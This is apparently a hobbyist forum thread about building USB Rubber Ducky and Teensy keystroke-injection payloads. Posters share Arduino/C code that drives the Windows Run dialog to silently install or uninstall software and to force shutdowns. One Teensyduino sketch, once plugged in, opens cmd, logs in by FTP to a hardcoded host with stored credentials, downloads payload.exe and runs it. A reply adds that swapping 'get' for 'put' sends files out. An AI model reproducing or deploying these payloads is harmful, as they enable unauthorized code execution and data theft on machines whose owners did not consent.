Netshroud

[Version 1] Ducky Payloads

Now we just need the code for all of them, lol. I like the idea of doing Google Docs though, lol.

Well, code is the only thing that counts. I don't have one, so I'm not going to do it myself.

I'm working on the code. It's mostly done, but I'm waiting for my Ducky to arrive so I can test it before releasing it.

The ones which are highlighted (slightly) have their code already written.

Here's a few that I quickly wrote up. They're only for Windows; I'll try to make Unix ones tomorrow.

#include <stdio.h>

// Assumed signature of IronGeek's CommandAtRunBar, defined elsewhere in the
// sketch: it opens the Run dialog (Win+R), types the command and presses Enter.
void CommandAtRunBar(char *SomeCommand);

// Each command is assembled with snprintf into a fixed buffer. In C/C++ the
// form 'text' + ProductName + 'text' is pointer arithmetic on char literals,
// not string concatenation, so it will not build the intended command line.
void MSISilentUninstall(char *ProductName)
{
  char cmd[160];
  delay(150);
  snprintf(cmd, sizeof(cmd), "wmic product where name='%s' call uninstall", ProductName);
  CommandAtRunBar(cmd);
  delay(20000); // wmic uninstall takes a while to complete
}

void MSISilentInstall(char *MSIFile)
{
  char cmd[160];
  delay(150);
  snprintf(cmd, sizeof(cmd), "msiexec /package %s /quiet", MSIFile);
  CommandAtRunBar(cmd);
  delay(5000);
}

void ReleaseRenewIpAddress()
{
  CommandAtRunBar("ipconfig /release");
  delay(1500);
  CommandAtRunBar("ipconfig /renew");
  delay(1500);
}

void ExecuteFile(char *filename)
{
  CommandAtRunBar(filename);
}

// timeout is passed as a string of seconds, e.g. "30"
void ComputerShutDown(char *timeout)
{
  char cmd[64];
  snprintf(cmd, sizeof(cmd), "shutdown -s -t %s", timeout);
  CommandAtRunBar(cmd);
}

void ComputerRestart(char *timeout)
{
  char cmd[64];
  snprintf(cmd, sizeof(cmd), "shutdown -r -t %s", timeout);
  CommandAtRunBar(cmd);
}

void ComputerHibernate(char *timeout)
{
  char cmd[64];
  snprintf(cmd, sizeof(cmd), "shutdown -h -t %s", timeout);
  CommandAtRunBar(cmd);
}

void ComputerStandby(int timeout)
{
  delay(timeout*1000); // Wait timeout seconds before suspending
  CommandAtRunBar("rundll32 powrprof.dll,SetSuspendState");
}

Please please please use the wiki that Darren set up.

This whole idea, using HID this way, was Darren's idea pretty much the moment he first saw Teensy, in the days of episode 503. Darren also financed sending 100 free Ducky kits to the Hak5 community!!

It's really only right to put this on Hak5's wiki. It's new and needs contributions.

http://www.hak5.org/projects/doku.php?id=usb_rubber_ducky

Paul, I put that up well before the wiki.

Sl45h3R, have you tested those functions? I'm writing my code in C, but I'm having issues passing strings around, as they need to be PSTR'ed.

Yes, these work fine using Arduino IDE + Teensyduino, along with IronGeek's CommandAtRunBar function.

Although the hibernate function will only work if hibernate is not disabled on the user's computer.

I have been working on FTP. It needs a little changing for upload and binary/ASCII; I have had a few problems with my FTP server, but it should work.

Ohhh, btw, I'm working in the Arduino language.

// Teensyduino sketch: requires Tools > USB Type set to "Keyboard" so that the
// Keyboard object is available.
void setup() {
  pinMode(PIN_D6, OUTPUT);      // LED pin must be an output before digitalWrite
  delay(7000);                  // give the host time to enumerate the device
  run();
  delay(500);
  Keyboard.print("cmd");
  enter();
  delay(500);
  Keyboard.print("ftp");
  enter();
  delay(500);
  Keyboard.print("o 192.168.0.8");
  enter();
  delay(500);
  Keyboard.print("test");
  enter();
  delay(500);
  Keyboard.print("lamepassword");
  enter();
  delay(10);
  Keyboard.print("get payload.exe");
  enter();
  delay(5000);
  Keyboard.print("quit");
  enter();
  delay(10);
  Keyboard.print("payload.exe");
  enter();
}

void loop() {
    digitalWrite(PIN_D6, LOW);   // LED on
    delay(1000);                  // Slow blink
    digitalWrite(PIN_D6, HIGH);  // LED off
    delay(1000);
}

// Press and release Enter
void enter(){
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void run(){
  // run dialog - win+r
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // release keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}

I already posted my FTP code, which can download files, and if you change "get payload.exe" to "put file.txt" it can upload them as well. With your code, you can save space on the Teensy if you delete

o 192.168.0.8

and use

ftp 192.168.0.8

My FTP code

-- edit --

On second thought, this looks very similar to my code.

On second thought, this looks very similar to my code.

Wow, they are quite similar. You could add the enter line to the echo section, since it is at the end of each echo.
